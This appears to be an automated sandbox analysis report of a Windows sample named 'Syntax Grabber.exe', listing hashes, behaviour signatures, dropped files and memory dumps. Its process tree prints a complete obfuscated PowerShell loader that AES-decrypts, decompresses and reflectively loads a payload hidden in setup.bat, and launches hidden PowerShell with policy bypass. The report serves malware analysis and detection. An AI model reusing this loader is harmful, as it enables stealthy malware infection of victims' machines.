1d9a6ee7b20ba3a798720d1fcba46ae816e2a64c80f14eac9ad0b8821a1510ad

Resubmissions

05-02-2025 19:00

250205-xnm5ma1khj 10

05-02-2025 18:56

250205-xld4ya1kdp 8

Analysis

max time kernel
18s
max time network
17s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
05-02-2025 18:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Syntax Grabber.exe
Size

7.9MB
MD5

4c281767e69dd74a8be2ec9f307b3403
SHA1

8976b9c3d954e988c305c3dcc637ef124a552462
SHA256

1d9a6ee7b20ba3a798720d1fcba46ae816e2a64c80f14eac9ad0b8821a1510ad
SHA512

fb0c2740980529a070ffb122bbbbc56941bce5debcee143ccafc36772fd8084570731d14be06513da2223cf77a6c99b1bd0a2864784119bdb3966e4c1f455b84
SSDEEP

196608:Nn1kbTz21W903eV4QRM993iObMGuLmUVe1Pck8qf:R2nzcW+eGQRe93iObyL9w982

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3688	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe
2584	Syntax Grabber.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3688	powershell.exe
3688	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2584	Syntax Grabber.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 516 wrote to memory of 2584	516	Syntax Grabber.exe	85
PID 516 wrote to memory of 2584	516	Syntax Grabber.exe	85
PID 2584 wrote to memory of 1444	2584	Syntax Grabber.exe	91
PID 2584 wrote to memory of 1444	2584	Syntax Grabber.exe	91
PID 1444 wrote to memory of 1820	1444	cmd.exe	95
PID 1444 wrote to memory of 1820	1444	cmd.exe	95
PID 1444 wrote to memory of 3688	1444	cmd.exe	96
PID 1444 wrote to memory of 3688	1444	cmd.exe	96

C:\Users\Admin\AppData\Local\Temp\Syntax Grabber.exe
"C:\Users\Admin\AppData\Local\Temp\Syntax Grabber.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:516
- C:\Users\Admin\AppData\Local\Temp\Syntax Grabber.exe
  "C:\Users\Admin\AppData\Local\Temp\Syntax Grabber.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\setup.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function bndBX($HPpxK){ $QVfaI=[System.Security.Cryptography.Aes]::Create(); $QVfaI.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QVfaI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QVfaI.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('sgXMNtLVYM5AnZ9ZEFQUx8TyPHMODdI9GHAzdHJFocM='); $QVfaI.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('xvPDK5S2mE0SarPqCahTRw=='); $FLnzN=$QVfaI.CreateDecryptor(); $return_var=$FLnzN.TransformFinalBlock($HPpxK, 0, $HPpxK.Length); $FLnzN.Dispose(); $QVfaI.Dispose(); $return_var;}function EePXD($HPpxK){ $hKRhy=New-Object System.IO.MemoryStream(,$HPpxK); $qdLAF=New-Object System.IO.MemoryStream; Invoke-Expression '$JlRpd #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$hKRhy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $JlRpd.CopyTo($qdLAF); $JlRpd.Dispose(); $hKRhy.Dispose(); $qdLAF.Dispose(); $qdLAF.ToArray();}function PILsM($HPpxK,$FzrPq){ $LFuXl = @( '$fPdCg = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$HPpxK);', '$arEvT = $fPdCg.EntryPoint;', '$arEvT.Invoke($null, $FzrPq);' ); foreach ($ZVLcK in $LFuXl) { Invoke-Expression $ZVLcK };}$CVpgq=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\setup.bat').Split([Environment]::NewLine);foreach ($AGPrv in $CVpgq) { if ($AGPrv.StartsWith('SEROXEN')) { $qNRCx=$AGPrv.Substring(7); break; }}$ANoQZ=EePXD (bndBX ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($qNRCx)));PILsM $ANoQZ (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\setup.bat')); "
      4⤵
      PID:1820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3688

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI5162\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\_bz2.pyd

Filesize
82KB

MD5
28ede9ce9484f078ac4e52592a8704c7

SHA1
bcf8d6fe9f42a68563b6ce964bdc615c119992d0

SHA256
403e76fe18515a5ea3227cf5f919aa2f32ac3233853c9fb71627f2251c554d09

SHA512
8c372f9f6c4d27f7ca9028c6034c17deb6e98cfef690733465c1b44bd212f363625d9c768f8e0bd4c781ddde34ee4316256203ed18fa709d120f56df3cca108b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\_ctypes.pyd

Filesize
120KB

MD5
22c4892caf560a3ee28cf7f210711f9e

SHA1
b30520fadd882b667ecef3b4e5c05dc92e08b95a

SHA256
e28d4e46e5d10b5fdcf0292f91e8fd767e33473116247cd5d577e4554d7a4c0c

SHA512
edb86b3694fff0b05318decf7fc42c20c348c1523892cce7b89cc9c5ab62925261d4dd72d9f46c9b2bda5ac1e6b53060b8701318b064a286e84f817813960b19

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\_decimal.pyd

Filesize
247KB

MD5
baaa9067639597e63b55794a757ddeff

SHA1
e8dd6b03ebef0b0a709e6cccff0e9f33c5142304

SHA256
6cd52b65e11839f417b212ba5a39f182b0151a711ebc7629dc260b532391db72

SHA512
7995c3b818764ad88db82148ea0ce560a0bbe9594ca333671b4c5e5c949f5932210edbd63d4a0e0dc2daf24737b99318e3d5daaee32a5478399a6aa1b9ee3719

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\_hashlib.pyd

Filesize
63KB

MD5
c888ecc8298c36d498ff8919cebdb4e6

SHA1
f904e1832b9d9614fa1b8f23853b3e8c878d649d

SHA256
21d59958e2ad1b944c4811a71e88de08c05c5ca07945192ab93da5065fac8926

SHA512
7161065608f34d6de32f2c70b7485c4ee38cd3a41ef68a1beacee78e4c5b525d0c1347f148862cf59abd9a4ad0026c2c2939736f4fc4c93e6393b3b53aa7c377

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\_lzma.pyd

Filesize
155KB

MD5
d386b7c4dcf589e026abfc7196cf1c4c

SHA1
c07ce47ce0e69d233c5bdd0bcac507057d04b2d4

SHA256
ad0440ca6998e18f5cc917d088af3fea2c0ff0febce2b5e2b6c0f1370f6e87b1

SHA512
78d79e2379761b054df1f9fd8c5b7de5c16b99af2d2de16a3d0ac5cb3f0bd522257579a49e91218b972a273db4981f046609fdcf2f31cf074724d544dac7d6c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\_queue.pyd

Filesize
31KB

MD5
50842ce7fcb1950b672d8a31c892a5d1

SHA1
d84c69fa2110b860da71785d1dbe868bd1a8320f

SHA256
06c36ec0749d041e6957c3cd7d2d510628b6abe28cee8c9728412d9ce196a8a2

SHA512
c1e686c112b55ab0a5e639399bd6c1d7adfe6aedc847f07c708bee9f6f2876a1d8f41ede9d5e5a88ac8a9fbb9f1029a93a83d1126619874e33d09c5a5e45a50d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\_socket.pyd

Filesize
77KB

MD5
2c0ec225e35a0377ac1d0777631bffe4

SHA1
7e5d81a06ff8317af52284aedccac6ebace5c390

SHA256
301c47c4016dac27811f04f4d7232f24852ef7675e9a4500f0601703ed8f06af

SHA512
aea9d34d9e93622b01e702defd437d397f0e7642bc5f9829754d59860b345bbde2dd6d7fe21cc1d0397ff0a9db4ecfe7c38b649d33c5c6f0ead233cb201a73e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\_ssl.pyd

Filesize
172KB

MD5
66e78727c2da15fd2aac56571cd57147

SHA1
e93c9a5e61db000dee0d921f55f8507539d2df3d

SHA256
4727b60962efacfd742dca21341a884160cf9fcf499b9afa3d9fdbcc93fb75d0

SHA512
a6881f9f5827aceb51957aaed4c53b69fcf836f60b9fc66eeb2ed84aed08437a9f0b35ea038d4b1e3c539e350d9d343f8a6782b017b10a2a5157649abbca9f9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\base_library.zip

Filesize
1.4MB

MD5
d220b7e359810266fe6885a169448fa0

SHA1
556728b326318b992b0def059eca239eb14ba198

SHA256
ca40732f885379489d75a2dec8eb68a7cce024f7302dd86d63f075e2745a1e7d

SHA512
8f802c2e717b0cb47c3eeea990ffa0214f17d00c79ce65a0c0824a4f095bde9a3d9d85efb38f8f2535e703476cb6f379195565761a0b1d738d045d7bb2c0b542

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\certifi\cacert.pem

Filesize
283KB

MD5
302b49c5f476c0ae35571430bb2e4aa0

SHA1
35a7837a3f1b960807bf46b1c95ec22792262846

SHA256
cf9d37fa81407afe11dcc0d70fe602561422aa2344708c324e4504db8c6c5748

SHA512
1345af52984b570b1ff223032575feb36cdfb4f38e75e0bd3b998bc46e9c646f7ac5c583d23a70460219299b9c04875ef672bf5a0d614618731df9b7a5637d0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\charset_normalizer\md.cp311-win_amd64.pyd

Filesize
10KB

MD5
723ec2e1404ae1047c3ef860b9840c29

SHA1
8fc869b92863fb6d2758019dd01edbef2a9a100a

SHA256
790a11aa270523c2efa6021ce4f994c3c5a67e8eaaaf02074d5308420b68bd94

SHA512
2e323ae5b816adde7aaa14398f1fdb3efe15a19df3735a604a7db6cadc22b753046eab242e0f1fbcd3310a8fbb59ff49865827d242baf21f44fd994c3ac9a878

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

Filesize
116KB

MD5
9ea8098d31adb0f9d928759bdca39819

SHA1
e309c85c1c8e6ce049eea1f39bee654b9f98d7c5

SHA256
3d9893aa79efd13d81fcd614e9ef5fb6aad90569beeded5112de5ed5ac3cf753

SHA512
86af770f61c94dfbf074bcc4b11932bba2511caa83c223780112bda4ffb7986270dc2649d4d3ea78614dbce6f7468c8983a34966fc3f2de53055ac6b5059a707

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\libcrypto-3.dll

Filesize
4.9MB

MD5
51e8a5281c2092e45d8c97fbdbf39560

SHA1
c499c810ed83aaadce3b267807e593ec6b121211

SHA256
2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a

SHA512
98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\libssl-3.dll

Filesize
771KB

MD5
bfc834bb2310ddf01be9ad9cff7c2a41

SHA1
fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c

SHA256
41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1

SHA512
6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\python311.dll

Filesize
5.5MB

MD5
65e381a0b1bc05f71c139b0c7a5b8eb2

SHA1
7c4a3adf21ebcee5405288fc81fc4be75019d472

SHA256
53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a

SHA512
4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\select.pyd

Filesize
29KB

MD5
8472d39b9ee6051c961021d664c7447e

SHA1
b284e3566889359576d43e2e0e99d4acf068e4fb

SHA256
8a9a103bc417dede9f6946d9033487c410937e1761d93c358c1600b82f0a711f

SHA512
309f1ec491d9c39f4b319e7ce1abdedf11924301e4582d122e261e948705fb71a453fec34f63df9f9abe7f8cc2063a56cd2c2935418ab54be5596aadc2e90ad3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5162\unicodedata.pyd

Filesize
1.1MB

MD5
57f8f40cf955561a5044ddffa4f2e144

SHA1
19218025bcae076529e49dde8c74f12e1b779279

SHA256
1a965c1904da88989468852fdc749b520cce46617b9190163c8df19345b59560

SHA512
db2a7a32e0b5bf0684a8c4d57a1d7df411d8eb1bc3828f44c95235dd3af40e50a198427350161dff2e79c07a82ef98e1536e0e013030a15bdf1116154f1d8338

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jfkdlx0j.lo3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.bat

Filesize
12.0MB

MD5
1a684200a72b01435283ba70a0dfff34

SHA1
42a6047958746a66b8cdf216668867cbc924192c

SHA256
ebf4a84c2462240e3e5347197412428a82f5fdbc66477e95cf4ef7e21225fb3a

SHA512
78686390f81aefa43325770fbbf1430ee4c102588998f34a5c72ab1aa33e00e16dc67b6b7aec72f8e56fef9037271b36dab4e585a5cf7f095a2511f9fe6d9bff

Download Submit
memory/3688-60-0x00007FFC68B23000-0x00007FFC68B25000-memory.dmp

Filesize
8KB

Download
memory/3688-76-0x00007FFC88170000-0x00007FFC8822E000-memory.dmp

Filesize
760KB

Download
memory/3688-71-0x00007FFC68B20000-0x00007FFC695E1000-memory.dmp

Filesize
10.8MB

Download
memory/3688-72-0x00007FFC68B20000-0x00007FFC695E1000-memory.dmp

Filesize
10.8MB

Download
memory/3688-73-0x000001226DED0000-0x000001226DF14000-memory.dmp

Filesize
272KB

Download
memory/3688-74-0x000001226E360000-0x000001226E3D6000-memory.dmp

Filesize
472KB

Download
memory/3688-75-0x0000012276700000-0x0000012276F98000-memory.dmp

Filesize
8.6MB

Download
memory/3688-61-0x000001226D570000-0x000001226D592000-memory.dmp

Filesize
136KB

Download
memory/3688-77-0x00007FFC887D0000-0x00007FFC889C5000-memory.dmp

Filesize
2.0MB

Download
memory/3688-78-0x00007FFC68B23000-0x00007FFC68B25000-memory.dmp

Filesize
8KB

Download
memory/3688-79-0x00007FFC68B20000-0x00007FFC695E1000-memory.dmp

Filesize
10.8MB

Download
memory/3688-80-0x000001226E3E0000-0x000001226EEAA000-memory.dmp

Filesize
10.8MB

Download
memory/3688-81-0x000001226EEB0000-0x000001226EF4A000-memory.dmp

Filesize
616KB

Download
memory/3688-82-0x000001226DF20000-0x000001226DF72000-memory.dmp

Filesize
328KB

Download
memory/3688-83-0x000001226E2E0000-0x000001226E338000-memory.dmp

Filesize
352KB

Download
memory/3688-84-0x000001226DE90000-0x000001226DEBE000-memory.dmp

Filesize
184KB

Download